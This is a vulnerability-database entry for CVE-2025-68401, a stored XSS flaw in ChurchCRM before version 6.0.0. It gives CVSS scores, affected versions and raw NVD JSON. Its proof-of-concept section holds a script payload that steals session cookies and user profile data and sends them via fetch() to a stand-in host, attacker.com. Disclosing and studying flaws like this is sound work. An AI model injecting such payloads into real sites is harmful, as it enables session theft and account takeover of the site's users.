Security Vulnerability Report
中文
CVE-2025-68401 CVSS 4.8 MEDIUM

CVE-2025-68401

Published: 2025-12-17 22:16:02
Last Modified: 2025-12-18 16:44:00
Source: [email protected]

Description

ChurchCRM is an open-source church management system. Prior to version 6.0.0, the application stores user-supplied HTML/JS without sufficient sanitization/encoding. When other users later view this content, attacker-controlled JavaScript executes in their browser (stored XSS). In affected contexts the script can access web origin data and perform privileged actions as the victim. Where session cookies are not marked HttpOnly, the script can read document.cookie, enabling session theft and account takeover. Version 6.0.0 patches the issue.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for ChurchCRM CVE-2025-68401 --> <!-- Requires high privilege access to inject content --> <!-- Example: Inject malicious JavaScript via a field that accepts HTML --> <script> // Steal session cookie if HttpOnly is not set var cookie = document.cookie; // Send cookie to attacker controlled endpoint fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(cookie)); // Alternative: Perform actions as the victim // Example: Make API calls to ChurchCRM endpoints fetch('/api/user/profile', { method: 'GET', credentials: 'include' }).then(response => response.json()).then(data => { // Exfiltrate user data fetch('https://attacker.com/exfil?data=' + encodeURIComponent(JSON.stringify(data))); }); </script> <!-- Simple alert PoC for verification --> <img src=x onerror="alert('Stored XSS - CVE-2025-68401')"> <!-- The injected script will execute when any user views the content -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68401", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:02.377", "lastModified": "2025-12-18T16:44:00.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.0.0, the application stores user-supplied HTML/JS without sufficient sanitization/encoding. When other users later view this content, attacker-controlled JavaScript executes in their browser (stored XSS). In affected contexts the script can access web origin data and perform privileged actions as the victim. Where session cookies are not marked HttpOnly, the script can read document.cookie, enabling session theft and account takeover. Version 6.0.0 patches the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "BA5E787D-173E-4C7E-9213-2C8F513CF5A4"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-phfw-p278-qq7v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-phfw-p278-qq7v", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.